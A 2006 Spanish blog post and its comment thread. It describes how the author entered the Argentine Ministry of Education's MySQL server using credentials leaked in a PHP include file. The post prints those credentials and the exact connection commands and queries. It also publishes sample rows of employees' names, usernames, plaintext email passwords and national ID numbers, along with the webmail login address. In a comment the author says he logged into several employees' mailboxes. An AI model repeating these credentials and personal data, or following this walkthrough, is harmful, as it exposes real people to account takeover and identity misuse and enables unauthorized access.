miércoles, enero 11, 2006

Como ver los datos personales de los empleados del Ministerio de Educación, en 3 pasos fáciles.

Como ver los datos personales de los empleados del Ministerio de Educación, en 3 pasos fáciles.

NOTA PARA SITIO WEB DE SOLAR.

La noche del 9 de Enero, un miembro de SOLAR que se hace llamar "Zorro", publicó la direccion de internet (URL) de un archivo perteneciente al Ministerio de Educacion (ME). Este archivo no deberia estar a disposición del público, ya que es de uso interno del servidor del ME. Lamentablemente, alguien en el ME configuró mal el servidor y ese documento quedó visible. Se trata de un archivo con extension .inc con codigo de programa (en lenguaje PHP), que en lugar de mostrarse, deberia ejecutarse y mostrarse el resultado de esta ejecución. Como el código estaba disponible, se podia leer, entre otras cosas, esta linea:

$link = mysql_connect("bdatos.me.gov.ar", "A_dsweb","EcSdrT");



Aca se expone informacion mas que interesante, a saber:

1. Direccion de la base de datos del ME, en este caso:
2. Nombre de un usuario.
3. Contraseña de ese usuario.

A esta altura, un miembro de la lista de SOLAR dice que de poco sirve esa información, ya que lo razonable seria que uno no pueda acceder a la base de datos desde un dominio de internet no autorizado. No siempre lo razonable es lo que pasa, la vida nos da sorpresas, y en este caso, compruebo que el servidor es accesible desde cualquier lugar de internet (no creo que mi dominio sea un dominio autorizado, por lo que supongo que no existe restriccion de acceso por lugar).
Para comprobarlo, uso este comando:

sbassi@vicky2:/home/vicky $ mysqladmin -h bdatos.me.gov.ar -u A_dsweb -pEcSdrT ping

Y obtengo como respuesta:

mysqld is alive

Al momento de escribir esto, 11 de Enero de 2006, todavia funciona, lo que significa que aun no han cambiado la contraseña. Espero que gracias a esta nota lo hagan.

Esto ya parecia preocupante. Para ver la magnitud del problema, exploré el contenido de esa base de datos, para determinar si estaban expuestos datos confidenciales. Primero me conecté a la base de datos, usando el programa MySQL que tengo instalado en mi Ubuntu Linux:

sbassi@vicky2:/home/vicky $ mysql -h bdatos.me.gov.ar -u A_dsweb -pEcSdrT


Con esto ya estaba adentro. Luego mire que bases habia presente:

mysql> show databases;
+----------+
| Database |
+----------+
| dsweb |
+----------+
1 row in set (0.05 sec)

Inmediatamente entre a esa base y listé sus tablas:

mysql> use dsweb;
mysql> show tables;
+------------------+
| Tables_in_dsweb |
+------------------+
| accesos |
| agetel |
| asignot |
| autores |
| ceremonial1 |
| ceremonial2 |
| ceremonial3 |
| ceremonial4 |
| ceremonial5 |
| claves |
| claves_ |
| congreso3aap |
| contadores |
| cuadros |
| departamentos |
| desenlaces |
| desenlaces2 |
| despacho |
| direcciones |
| dispositivos |
| edificios |
| enlaces |
| eventos |
| hweb |
| ife |
| mail |
| maquinas |
| ncos |
| ncos01 |
| ncos02 |
| ncos03 |
| ot_maq |
| prueba |
| sitios |
| soporte |
| soporte01 |
| soporte02 |
| tecnicas |
| tel_dependencias |
| tel_usuarios |
| tempo1 |
| tramix |
+------------------+
42 rows in set (0.09 sec)

mysql>

El siguiente paso es explorar el contenido de las tablas que parecen mas interesantes (claves, mail, etc). En el caso de mail, pude obtener informacion confidencial con la siguiente consulta de MySQL:

mysql> select nombre,usuario,clave from mail;

El resultado de esta consulta es muy largo como para publicar aca, basicamente se trata de los nombres completos, nombres de usuario y clave de correo de mas de 1300 empleados del ME.

Como muestra, publico algunas lineas:

| Aníbal Renzulli | arenzulli | 1532rzl |
| Nélida María Razzotti | nrazzotti | 861nlt |
| Programa Calidad Univ. | spucalidad | QlT9130 |
| Prog. Calidad Universitaria | spuciclos | Cspu205 |
| Andrea Rossi | arossi | 1161 |

Esto es grave. Con esta informacion podemos revisar el correo electronico de los empleados del ME. Para hacerlo hay que autenticarse en su webmail, que queda en: https://webs.me.gov.ar/WebMEil/index.php (la direccion fue obtenida usando el propio buscador del ME, no es ningun secreto). Lo sorprendente en este caso es que las claves esten "abiertas", esto es, en texto plano, listas para usar. Normalmente se guarda un "hash" (o firma) de la clave, pero no la clave en si. Este hash suele ser un codigo hexadecimal producto de algun algoritmo que "encripta" las claves en una sola via (o sea, no puede usarse el producto o hash para recomponer la clave) como el MD5. Esto tampoco es infalible, ya que hay utilidades como md5crack que prueban por fuerza bruta distintas contraseñas hasta encontrar una coincidencia entre el hash y la contraseña. Incluso hay servicios via Web que hacen algo similar (http://www.securitystats.com/tools/hashcrack.php , http://gdataonline.com/seekhash.php). A pesar de no ser una tecnica 100% segura (la probabilidad de romper la contraseña depende inversamente de la longitud y complejidad de la misma), es por lejos una mejor solución que almacenar las contraseñas en texto plano.
Si ademas quieren los telefonos personales y DNI, pueden obtenerlo con:

mysql> select * from mail;


La salida de este comando es logicamente mas completa que el anterior, por lo que tampoco sera publicado. En ambos casos tuve que ampliar el buffer de mi Gnome Terminal para poder capturar toda la salida (mas de 700Kb). Aqui muestro un fragmento al azar del resultado de esta consulta:

| | Avda. Santa Fe Piso 12 | NULL | Despacho | | 6236 | Fabricio Richiardi | 15:00hs. a 19:00hs. | frichardi | fbc938 | 12-08-05 | | 28.938.969 | |
| NULL | Dire. de G. C. y F. Docente | Lic. Alejandra Birgin | | Marcelo T. Alvear Piso 1° | NULL | 134 | | 7408 | Iván Alejandro S. Salgueiro | de 15:.ohs. a 19:00hs. | issalgueiro | 894ndr | 19-08-05 | | 92.894.155 | |
| NULL | Coordinación Gral. Estudios de Costos | Luisa Duro | | Avda. Santa Fe Piso 14° | NULL | frente | | 6277/1983 | Ana Beatriz Copes | 10:00hs. a 18:00hs. | acopes | trz152 | 19-08-05 | | 22.702.152 | |
| NULL | DINIECE | Margarita Poggi | | Paraguay Piso 2° | NULL | 202 | | 1448/1422 | Juan Pablo Rodriguez | 12:00hs. a 19:00hs. |


A esta altura de los acontecimientos estaba escribiendo a los responsables del ME, lo hice utilizando el formulario de contacto que esta en su página, pero hasta ahora no he tenido ninguna respuesta, a pesar que di ejemplos de la cantidad y calidad de informacion que se esta filtrando. Incluso publiqué en mi blog parte de la informacion, con la intencion de informar del problema, ya que estimo que cuanto mas gente sepa lo que esta pasando, antes será tapado el agujero.

Conclusiones:

Esta filtracion de datos no se produjo "por un error", sino por la sumatoria de 3 errores:

1. Publicacion del archivo .inc en lugar de su ejecución.
2. Base de datos sin limite de acceso.
3. Almacenamiento de claves sin encriptar.


Antes que alguien argumente que la publicacion del codigo fuente es un problema de seguridad (como critica al software libre), comento que no hay necesidad de incluir contraseñas en un codigo que es para distribucion. De hecho el problema surge aqui porque hay una distribucion involuntaria del codigo fuente. Si alguien se pregunta como encontraron ese código que supuestamente no estaba destinado al público, la respuesta es sencilla: Google. Mauro Lacy nos ilustró con este ejemplo de cadena de búsqueda .
Los resultados son nada mas ni nada menos que las páginas que no deberian verse dentro del dominio .gov.ar. Ante la controversia sobre si Google deberia dar esa informacion, opino que hay que tener en cuenta que el buscador es solo un mensajero, y que si tuvo acceso a esa información, es porque el operador la puso disponible como primera medida, Google solamente indexa siguiendo enlaces que son de acceso publico.
¿Que medidas deberian tomarse contra el administrador de sistemas del ME, que deja al desnudo todos los datos personales de los trabajadores? Es dificil opinar desde aca. Evidentemente se ha cometido un error (o varios segun como se vea) y el primero que debe responder es el encargado del area, pero como desconozco las condiciones de trabajo de esa persona (con que recursos cuenta, que libertad de accion tiene, etc) me parece apresurado emitir un juicio de valor sobre su responsabilidad.
El proposito de esta nota es ilustrar sobre los problemas de seguridad y alertar al ME sobre estos problemas, ya que a pesar de haberles escrito, no han dado ninguna respuesta. Como medida adicional de aviso, escribi a varios usuarios usando sus propias cuentas, ya que los usuarios al ser los mas afectados son quienes reclamarian ante quien corresponda. El hecho que sea época de vacaciones seguramente contribuye a que pasen los días sin que se solucione. La gente debe tomarse vacaciones, pero la seguridad, no.


Sebastian Bassi.
sbassi+solar@gmail.com

72 comentarios:

A las 11:56 PM , Anonymous osi ha dicho...

Esto UN VERDADERO AUDITOR DE SEGURIDAD NUNCA LO HARIA. Mínimo te mereces una denuncia. Ya en barrapunto en un comentario te dicen QUE ES lo que deberías haber hecho.

 
A las 12:25 AM , Blogger Sebastian ha dicho...

No soy un auditor de seguridad, simplemente soy alguien que descubrio un problema y trata de solucionarlo. No encontré mejor manera antes de escribir en /., pero ahora estoy considerando los comentarios y espero aprender de esta experiencia.

 
A las 12:49 AM , Anonymous Anónimo ha dicho...

Seba, ojo que mepa que te vas a comer un garron de juicio mal. Posta. Por boludeces menores te mandan a los milicos. Y en este caso la Federal. Espero que no te pase nada, yo que vos, antes que nada saco el artículo del Blog. Posta te lo digo por experiencia.

 
A las 12:53 AM , Anonymous Anónimo ha dicho...

Que grande... esta bien, cada uno hace de su culo un blog, y lo publica!!!

Aparte, en la historia argentina nadie se retractó por sus malas acciones, y se comen la papuza veraneando en agosto, comenzando por el sector publico (funcionarios, etc..) Primero que arreglen las escuelas que se caen abajo, paguen salarios dignos a los maestros, paren de robar y que despues el mysql y el php.

Apruebo esta accion -> vale aclarar.

1___1
o o
||
>-->

 
A las 1:02 AM , Anonymous Anónimo ha dicho...

... del texto anterior... errata: [...] y que despues ARREGLEN el mysql y el php.

Aparte, para no echar mas leña al fuego, mi opinion es que el gobierno tiene a su disposicion los mejores programadores que pueda ofrecer, valga ingnieria de la uba, porque pasan estas cosas?, que se nota a tres pueblos que hicieron una grasada... como todo lo que se hace en dependencia del sector publico,... la verdad que este tema me da dolor de panza... creo que es el lado obscuro de mi cerebro que por temor a lo que vea no se quiere encender....

Argentina, una lagrima.

Alguna vez saldremos del pozo con una manga de ladris como funcionarios publicos?

!PUTAS AL PODER QUE SUS HIJOS YA LO ESTAN!

 
A las 1:20 AM , Anonymous Anónimo ha dicho...

Man te veo escribiendo un mail al estilo Chaban explicando como puede pasar esto "desde el punto de vista gubernamental"
Pero no te preocupes, estaremos alli para pedir la cabeza del jefe de gobierno por el publicar usuario y contraseña de su base de datos en la pagina web

Si miro a la gallina y no la toco, me guardan igual?

SALUDOS A LOS MUCHACHOS DE SIDERWINDS
SALUDOS A MARIA JULIA
SALUDOS AL PUEBLO ARGENTINO QUE PAGO LA LIMPIEZA DEL RIACHUELO
SALUDOS A LOS HIJOS DE PUTA QUE HICIERON LA PESIFICACION
SALUDOS A YABRAN
SALUDOS TOTALES

 
A las 1:23 AM , Anonymous Anónimo ha dicho...

Se ve el mismo error buscando con google en http://www.pjn.gov.ar/mysql.inc clave root y password ""
Personalmente administro servidores de poca monta, pero se aprecia el descuido y la falta de idoneidad del personal relacionado al área computacion dentro del gobierno. Seguro se terminan pasando a S.O. privativos, en lugar de tener personal idoneo.

 
A las 4:23 AM , Blogger quique ha dicho...

Decís que no conseguiste contactar con ningún responsable del ME.

Sin embargo, tenés los nombres completos, nombres de usuario y claves de correo de más de 1300 empleados, sus direcciones y teléfonos personales, cargo que ocupan, etc.

¿Por que no los usaste, en vez del formulario?

 
A las 5:17 AM , Anonymous Anónimo ha dicho...

Oh tio !!
Que bueno eres !!
Eres el mejor !!

Venga va, ya estás contento?

Que pena dan algunos ¬¬'
Con un poco de suerte te ponen una denuncia :)

Son datos PRIVADOS que NO puedes publicar.
Si después de 1300 mensajes (uno a cada mail) no te hacen caso, entonces llamas por teléfono y si tampoco te hacen caso, pasas del tema y lo dejas así.

Pero desde luego publicar los datos no es lo correcto.

Lo que te digo, denunciado deberías estar majete.

 
A las 5:51 AM , Anonymous Anónimo ha dicho...

Sebas:
NO te calentes, vos tranqui y como ya dijiste antes: aprende de esta experiencia.

Podes ligar algun juicio penal? Ok, es posible. Pero despues que pases todo eso (algun tipo de pena tendras), vas a ser Gardel y Maradona juntos.

Lo del principio: vos tranqui, que algun dia habra pasado lo peor y ahi vas a estar en la gloria.

saludos desde Irlanda.

 
A las 5:58 AM , Anonymous Anónimo ha dicho...

NO HAGAS NI CASO SIMPLEMENTE HAS PUBLICADO UN ERROR PROTECCION DE DATOS DE UN SITIO QUE SE SUPONE SEGURO.
LO QUE OCURRE ES QUE MUCHOS TIENEN ENVIDIA DEL VALOR QUE LE HECHAS AL PUBLICAR ESTO EN TU BLOG.

ANIMO

 
A las 6:26 AM , Anonymous Anónimo ha dicho...

A la hora de este post la base sigue abierta. Son unos impresentables.

 
A las 7:48 AM , Anonymous Anónimo ha dicho...

Desde mi punto de vista, el único error es haber publicado ciertos nombres de usuarios completos, dirección y demás. Yo habría usado asteriscos para semiocultarlos, y el que quiera que entre y lo vea por sí mismo. No sé como estará el tema legal, pero éticamente, has hecho lo correcto. Que espabilen. Me gustaría saber cuanto cobra el lumbreras que la ha pifiado, porque seguro que se va de vacaciones con lo que le roba den impuestos al pueblo argentino, con la conciencia tranquila.

Un español.

 
A las 7:49 AM , Anonymous Anónimo ha dicho...

Estoy completamente de acuerdo con ésta acción. Creo que no podemos pensar en sólo olvidar el tema. El es una omisión de alguien y es una tontería acusar a quien a ingresado y mostrado como ingresar a un "lugar abierto".

Parece que no están interesados en solucionarlo y estoy completamente de acuerdo en que esta publicación es una medida para llamar la atención del reponsable.

Si alguien aquí puede ser acusado deberá ser el encargado del sitio y no quien ha encontrado una vulnerabilidad y la ha publicado.

La información publicada no es diferente de la que cualquier persona pudo encontrar haciendo uso de mysql e instrucciones de sql, por lo que creo que quien las está _publicando_ es el encargado de administrar esta base de datos. No de quien reporta la vulnerabilidad y presenta un ejemplo.

 
A las 7:51 AM , Blogger El Enlace Sindical ha dicho...

Sebastián, ya has llevado esto demasiado lejos, ¿no te parece?
Ahora hazte un favor y saca esos datos de ahí, aunque sólo sea para ocultar los detalles sensibles, pero córtate ya.

Yo he visto esto antes. Y te aseguro que, digan lo que digan las leyendas urbanas, esto te va a costar tu carrera como informático. Oh, y también podrían caerte penas de cárcel... En algunos países de Europa esto son dos años de condicional.

De verdad. Déjalo antes de que sea demasiado tarde. Esto te viene muy grande, chaval: te estás metiendo con tu gobierno por nada.

 
A las 8:02 AM , Anonymous SKyo ha dicho...

Has metido la pata con este post, no son las formas de hacer publico algo de este tipo. Realmente tienes suerte de vivir en Argentina, con un comentario de este tipo en España te habrían enjuiciado así de rápido y el año de carcel no te lo habría quitado nadie, amen de que con los antecedentes judiciales lo ibas a tener bien complicado el encontrar empleo en ninguna parte. ¿Quien se fiaría de alguien que a la minima publica vulnerabilidades de sistemas en la web?

 
A las 8:18 AM , Blogger Sebastian ha dicho...

Con respecto al comentario de porque no use los 1300 datos de contacto para comunicar el problema, le cuento que si, use algunos de esos datos. No le escribi a todos, eso seria hacer spam (y odio a los spammers, asi que no voy a hacer yo lo que no me gusta que me hagan). Me meti en varias cuentas y escribi a sus contactos un reporte del problema. Pero no sirvio de nada. En cuanto a llamar por telefono, no voy a hacer llamados larga distancia (vivo en el interior y el ministerio esta en Buenos Aires) habiendo internet y teniendo tantos emails y un formulario que existe especialmente para ello.

 
A las 8:41 AM , Anonymous Anónimo ha dicho...

Ayer pasé por la puerta de la dsicoteca más exclusiva del lugar y descubrí que no había guardia, las puertas estaban abiertas y cualquiera podía entrar si sabía cómo llegar al lugar. Entré para comprobarlo y mi sorpresa fue mayor cuando vi que los baños no tenían puertas y se podía ver a los hombres y las mujeres haciendo sus necesidades. Horrorizado le advertí al encargado del lugar pero este me dio vuelta la cara e ignoró. La situación me pareció inverosímil y una falta de respeto del encargado, por lo que decidí publicarlo en mi blog para que todos se enteraran del perjuicio que este descuido le causaba a los clientes de la disco. Incluso puse la dirección del local, para que el encargado se diera cuenta del tamaño de su error.
Ok, les molesta? Me van a demandar y dejar libre al encargado?

Hiciste bien loco, tuviste los cojones suficientes y así se van a curar.

 
A las 8:42 AM , Blogger daniel ha dicho...

Espero que ademas de que te haya servido para "probar" no tengas problemas legales...

He publicado el contenido de tu post y tambien tu link.... por si te obligan a desaparecerlo...

Mucha suerte !

 
A las 8:52 AM , Anonymous Anónimo ha dicho...

perfecto, deberian haberlo solucionado, contactarte y agradecerte que les hayas avisado. pero claro estamos en argentina...
no puede ser que siempre se mate al cartero, por que??? por avisar??? perfecto seba.

 
A las 9:15 AM , Anonymous Anónimo ha dicho...

son las 9:13 y acabo de probar y todo sigue igual, podes conectarte y hacer lo que quieras.

esta gente no aprende mas.
Sebastian bien lo tuyo, lo mejor que se puede hacer con un problema de estos es publicarlo al mundo. Seguramente, la gente que trabajo en el desarrollo del sitio, no volvera a cometer estos errores.

 
A las 9:18 AM , Anonymous Dr Smegan ha dicho...

BLA BLA BLA... puras ñoñadas.. suponiendo que realmente sebastian haya descubierto esto.. el hecho de ponerlo en el blog es como una muestra pedante de poder y dominio mundial.. ÑOÑO!!! ZURDITO!!! =D
Que tienen que ver los empleados con este problema? porque publicaste sus datos y la forma de entrara a la base??? vos te queres lavar las manos y limpiar tu conciencia escribiendo cosas como "mande mails y no me dieorn bola".. MIS POLAINAS!!!
En resumen.. mi opinon: ÑOÑO que se la tira de hacker

 
A las 9:27 AM , Anonymous Anónimo ha dicho...

A la hora de este post el sevidor SQL ya no responde al ping, devuleve un mensaje de acceso no permitido, así que supongo que ya se habrán dado cuenta...

Hay varios problemas aquí, el primero, obvio, de seguridad. Es inconcebible que una organización gubernamental (Y no cualquiera, sino un ministerio) tenga fallos de este estilo. Dice muy poco del responsable de ese área. Espero, como dijo alguien más arriba, que no se culpe al software, sino que se señale a los verdaderos culpables: Los administradosres.

Por otra parte, creo que te has pasado un poco, sebastián. No dudo que tu intención sea ayudar. Pero pisas terreno peligroso en el momento en el que publicas no la manera de hacerlo, sino también datos confidenciales. Si sólo hubiera sido la manera, tu denuncia hubiese tenido el mismo poder, y allá cada uno si lo quiere intentar. Pero con los ids, las passwords y demás... Tío, te puedes haber metido en un buen lío... Porque la base de datos estará ya bloqueada a accesos externos, pero los datos confidenciales ya han sido publicados... Además EL ACCESO AL WEBMAIL SIGUE RESPONDIENDO A LAS CLAVES Y USUARIOS QUE PUBLICASTE (AVISO PARA LOS (I)RRESPONSABLES DEL MINISTERIO).

Por otro lado, y si tan grave te parecía, creo que realmente hubiera valido la pena la llamada que dices rechazar hacer por ser de larga distancia.

No sé... Las gans de ayudar son loables, pero te has extralimitado un poco.

 
A las 9:28 AM , Anonymous Alberto Ferrer ha dicho...

Mira, corta, aca nadie te puede tocar.

Vos avizastes, si no te dan pelota que se re curtan.

Si vas por la calle, pisas a alguien y no lo ayudas vas en cana, si la nacion se manda un MOCO , ¿nadie le dice nadA?

Esto no es España, Ni Ilatia, es Argentina, aca el que no afana es un gil (Lease Gardel).

Yo hice lo mismo que vos en varias ocaciones, si no, que queda para los "supuestos" hackers de exploits, que viven codeando 0days, tendrian q ir en cana.

No hay 1 solo Linuxero que jamas los alla usado, (de los viejos porlomenos).

Asi que no vengamos con boludeces gente.

Seba,

error: 'Host 'my.lan.org' is not allowed to connect to this MySQL server'

Ya lo arreglaron, por las malas, pero lo hicieron.

 
A las 10:18 AM , Anonymous Anónimo ha dicho...

- Vos avizastes
- ocaciones
- ...los alla usado...

te hacer el moralista y mira las burradas que escribis. Asi le va a tu país

Aprende a escribir pelotudo...como

 
A las 10:32 AM , Anonymous Anónimo ha dicho...

Muy interesante tu descubrimiento. Creo que es el claro reflejo de como está la educación en Argentina. Por otro lado, fiel a las costumbres, se quiere matar al mensajero. Mínimo deberian pagarte una consulta o auditoria de sus sietmas completos. Exitos y que no sea nada.

 
A las 10:59 AM , Anonymous Dr Smegman ha dicho...

Me da por las bolas que todo el mundo ponga algo como "asi esta argentina.." o pelotedeces por el estilo.. queridos.. sepan que MILES de empresas SERIAS que hacen un exelente trabajo de asesoria e implementaciones de seguridad informatica y no porque se haya descubierto esto (cosa que no me parece demasiado veridica) resulta que todos los prof. en informatica del pais somos tarados.

 
A las 11:06 AM , Anonymous Anónimo ha dicho...

Si llamaste y no te dieron pelota, que se jodan por forros y enfermos, negligentes de mierda. Esta barbaro lo que hiciste.

 
A las 11:11 AM , Anonymous ArCERT ha dicho...

La Administración Pública Argentina cuenta con un CERT donde se pueden realizar este tipo de denuncias: www.arcert.gov.ar
En este momento nos estamos poniendo en contacto con los administradores del Ministerio de Educación.
En ArCERT contamos con una base de responsables informáticos de muchos organismos públicos de Argentina y colaboramos en la resolución de este tipo de problemas. La resolución de incidentes demuestra ser mucho más rápida por esta vía.
En muchos casos comunicarse con los administradores de un sitio por cuenta propia es engorroso y puede causar una falsa sensación de ser ignorados, porque la cuenta a la que se envia la información no es la correcta.
Ya saben que hacer la próxima vez.
Saludos

 
A las 11:32 AM , Anonymous Anónimo ha dicho...

hey, cual es el problema, estamos hablando de empleados publicos, NADA NUEVO.
Oh caramba, ahora que lo pienso, hay una red de farmacias que intercambia informacion por internet USANDO EL PROTOCOLO DE RED DE WINDOWS.
Queridisimos amigos, de que se escandalizan?

 
A las 12:47 PM , Anonymous Carlos José Barroso ha dicho...

Me parece perfecto que si nadie te dió pelota, hagas lo que hiciste. Coincido con el comentario que deberías haber puesto asteriscos para proteger los nombres de los empleados, al menos en parte.
También es cierto que arCERT es el lugar indicado para que enviemos todas las vulnerabilidades de este tipo que encontremos, pero visitando su sitio me dá la sensación que que quieren parecer mas "1337" de lo que realmente son. Los problemas de seguridad en la administración pública siguen siendo gravísimos, usen Windows, Linux o cualquier sistema operativo, porque, como todo lo público en la Argentina, está plagado de gente puesta a dedo, y no por sus propios méritos. Yo mismo he tenido la experiencia de perder contra personas mejor posicionadas políticamete, pero técnicamente muy pobres. Reflexionemos un poco, que esto es solo una arista del problema general de este país.

-charlie-
cjbarroso (dentro de) gmail (pto) com

 
A las 1:47 PM , Anonymous Anónimo ha dicho...

seguro que los desarrolladores son dos changos que trabajan en un plan social, les pagan dos mangos, no son capacitados, y son lo únicos dos changos que laburan en informatica, además de administrar el sitio, tienen que estar arreglando todas las computadoras del ministerio, instalando winamp a los secretarios para que puedan escuchar mp3, atienden todos los llamados de gente diciendo: "no puedo navegar!!!!, necesito entrar a la página del afip" y ellos saben que es mentira, andan boludiando por la red. Y ensima quieren que esos dos changos mantengan la red segura. Mientras el resto de los pelotudos se la pasan mandándose powerpoint y tarjetitas.

 
A las 1:57 PM , Anonymous Anónimo ha dicho...

hombre, yo no lo habria publicado en barrapunto, pero me parece bien que los fallos de seguridad se hagan publicos, a ver si asi de una vez se dan cuenta de que los servidores privativos que puede administrar CUALQUIER INUTIL no son aptos para datos importantes... SOFTWARE LIBRE EN LOS GOBIERNOS YA

 
A las 2:31 PM , Anonymous Anónimo ha dicho...

Ya esta arreglado los datos del ME

 
A las 4:21 PM , Anonymous Anónimo ha dicho...

ya habia leido esa informacion en este blog:

http://mousehack.blogspot.com/2006/01/graves-fallos-de-seguridad.html#links

que a su vez remite a la pagina de la originaria informacion...

por lo menos ten la dignidad de poner las fuentes de donde sacaste esto y no la de arrogartes los creditos...

 
A las 4:33 PM , Blogger Sebastian ha dicho...

En el articulo esta claro cual es mi fuente: Un post de un tal "zorro" en la lista de SOLAR. Si despues (o antes) ese mismo zorro lo publico en otro lado, es otro tema, yo me entere por la lista esa que estoy desde su creacion hace 2 años (y soy miembro de SOLAR). Por lo que cumpli 100% en poner la fuente de la información. El hecho que otro tambien haya descripto lo mismo, demuestra que la información estaba accesible para cualquiera que sepa lo mas basico de MySQL. Es interesante ese post, porque ponen online parte del dump de la base, lo que es mas grave que poner 4 registros como hice yo. Por lo que tambien confirma el hecho que no divulgue nada nuevo, ya que estaba en esa pagina desde el 9 de Enero.

 
A las 4:44 PM , Anonymous Anónimo ha dicho...

Hola Sebastian, la verdad que lo tuyo fue un acto realmente valiente, enhorabuena, y gracias por preocuparte, te cuento que tu articulo valio la pena, ojala no tengas consecuencias

 
A las 6:47 PM , Anonymous Anónimo ha dicho...

Bien Seba, te leo siempre en la lista del lugro. No des bola, no pasa nada, yo tuve un problemita con ley por entrar a una MAN sin querer, no pasa, no hiciste nada malo. Los que hablan en contra noe ntienden nada, he leido hasta la palabra hacker aca, dios... no revienta cuando hablan sin saber? que costumbre de la gente, no?

 
A las 6:57 PM , Anonymous Anónimo ha dicho...

mira legalmente podes salir muy perjudicado..por que? te pueden hacer un juicio penal y civil, o sea podes ir preso y ademas pagar por danios, sabias eso? sabias que si la suma de plata no la podes pagar, el %30 de tu sueldo te sera descontadode por vida si no logras cubrir el monto? si es que sos mayor y sino el de tus padres? lo sabias? no creo de haberlo sabido no lo hubieras publicado tan abiertamente, no interesa si sos de un grupo o X, estas bajo la ley argentina de guste o no y de la carcel nadie de tu grupo de jacas te va a sacar ni pagar por los danios(morales basicamente..)...valiente o no, fue ESTUPIDO lo que hiciste

 
A las 7:10 PM , Anonymous Anónimo ha dicho...

pero excelente, me encanta que te hayas gastado para poder descubrir a fondo el error y publicarlo sin pedir nada a cambio. Es una joda total el gobierno, ya sea de cosas como estas para arriba, son todos empleados ñoquis en todos los lados parece. La verdad es un chiste total, si fuese la página de alguna intendencia bueeeh (no es justificado pero entendible), pero no la página del ministerio de educación de la nación! Esto te demuestra que el país no cambia más. Por suerte hay gente desinteresada como vos que se gasta para intentar cambiar algo (aunque no te den bola). saludos y excelente por publicarlo, no hay nada malo, solamente estás poniendo información que es pública (puesto que no tiene protección).

Un saludo desde inglaterra

 
A las 7:30 PM , Blogger Kiwi-HeffeQue ha dicho...

Lo curioso es que los primeros en saltar son los propios argentinos. Pues no, deberíais estar orgullosos de que tengáis a una persona que se preocupa por su país y su política y seguridad de esta manera. Estoy de acuerdo con que no deberías haber puesto los nombre completos y contraseñas diréctamente en este post (te aconsejo que lo edites), pero la intención es muy noble. Estar avergonzado de cómo funcionan las entidades públicas de tu país no es signo de ser un "boludo" (como algún compatriota tuyo te denomina), sino de sentir amor por tu tierra y querer darle un futuro mejor. Mis respetos por tu preocupación y mi más profunda vergüenza ajena hacia los que se avergüenzan de una persona que ama a su tierra de una manera sana y saludable.

 
A las 8:25 PM , Anonymous Anónimo ha dicho...

men, a mi me parece que hiciste bien. Escribiste el mail, y no te respondieron.
O sea, publicarlo fue re para hacerte el ohoho, lo cual me parece bien tambien.
Pero bueno, sabe que esas cosas tienen sus consecuencias.
suerte!!! y felicitaciones por el laburo
juan p. lopez bergero

 
A las 9:25 PM , Anonymous Anónimo ha dicho...

QUE SE JODAN!

Asi de claro, que se jodan los del ministerio.

Y es mas, deberian de haberse publicado las bases de datos en diferentes webs a traves de bittorrent o algo por el estilo.

¿Que por que?

Simple.

La información guardada en un ministerio de sanidad, no solo atañe a estos funcionarios, si no a todos los argentinos.

Si dispones de las claves, puedes entrar a ver historiales medicos, puedes hacerte con los datos de pacientes, puedes dedicarte a venderles cualquier mierda de esas para poner el pene tieso a todos aquellos que sufran de impotencia, puedes venderles publicidad de implantes de silicona a las que tengan tetas pequeñas, etc, etc, etc.

Y esto es solo responsabilidad del estado, del gobierno, a quien los ciudadanos confian sus datos.

Si el gobierno no ha pagado los suficiente o no ha contratado al equipo necesario para que esos datos siguieran siendo privadados, el problema es del gobierno, y nunca de quien descubre el fallo.

Es mas, si el autor de este blog no hubiera publicado esto, se hubiera tapado el agujero sin mas y se habrian dejado otros tantos.

Esta claro, Sebastian es un ciudadano modelo y asi lo veo yo, podria perfectamente haber vendido la base de datos a las farmaceuticas o agancias de publicidad y no lo hizo.

A los que hablan de calamidades para Sebastian, que se vayan a la mierda, que el truquito del miedo ya lo utilizan los norteamericanos para tener a la población asustada.

Bravo Sebastian!, mil veces Bravo!!!

 
A las 9:49 PM , Anonymous Anónimo ha dicho...

Bueno a ver si antes de hablar investigan más de este tipo Sebastian Bassi. Aquí les paso unos enlaces. hace rato viene truchando como autor de artículos el y sus amigos.
no sean tan giles y no le den tanta vida al inútil de Sebastian.

http://superiores.blogalia.com/historias/4109

http://digital.el-esceptico.org/leer.php?id=1705&autor=83&tema=127

http://www.dios.com.ar/notas1/creencias/invesyreve/asalup/nota_asalup.htm

No me importa el tema del Ovni ni Jesus ni nada, pero posta que este pibe y susu amigos viven del trabajo ajeno.

 
A las 9:55 PM , Anonymous Zorro ha dicho...

Yo publique el problema en solar tecnica entonces van a tener que denuciar a todos ya que muchos deben haber usmeado la base solo lo sabe el syslog, ahora bien lastima que en la misma no se encuentren los datos de los recursos que se destinan para el mantenimiento de estos servidores porque sino estariamos frente a una incongruencia.
Mi primera publicacion la realice aqui donde existe libretad de expresion.

http://freeconnects.webcindario.com/index.php?option=com_content&task=view&id=91&Itemid=1

Saludos

 
A las 12:12 AM , Anonymous Anónimo ha dicho...

Sebastian, me parece muy bien que hagas publica la noticia, no es una empresa privada, si no del estado, es decir que si ELLOS no cuidan los datos del estado, tampoco cuidan los nuestros que somos los que votamos a nuestros representantes.
Ya paso muchas veces que se encontraron bases abiertas que revelan datos sensible, tal vez con esto aprendan.
Saludos y suerte!

 
A las 12:49 AM , Anonymous Anónimo ha dicho...

No se porque joden tanto con "esto pasa porque es argentina" cuando errores asi hay en todos lados. mas alla de los 5 minutos de fama que conseguiste, cuando aparescan los problemas legales el "animo chaval!" no te va ayudar, creeme. En cuanto al "despues sos gardel" tambien es patetico pq mysqld abiertos para todos esta lleno en internet, nadie te va a contratara como überconsultor de seguridad por eso. Recuerdo incluso que el mysql de meteofa.mil.ar estaba abierto para todos hace unos años y las bases estaban tan mal hechas (passwds en plain text) que te hacias de una cuenta ssh enseguida. Alguien se entero de ello? nadie, pq hace algunos años todavia existia gente inteligente y no morbosos sedientos de fama.

 
A las 1:00 PM , Anonymous Anónimo ha dicho...

10 puntos.
A ver si en el ME aprenden algo. :)

 
A las 2:34 PM , Anonymous Anónimo ha dicho...

Puse un post mas arriba; lo que realmente me ha llamado la atencion es que ninguno de los 500 que ingresamos a la base de datos realizo algun daño o cambio. Eso queda claro que somos personas de bien y que actitud de todos ha sido honesta desde el primer momento. Incluso del propietario de este blog como de todos los demas.
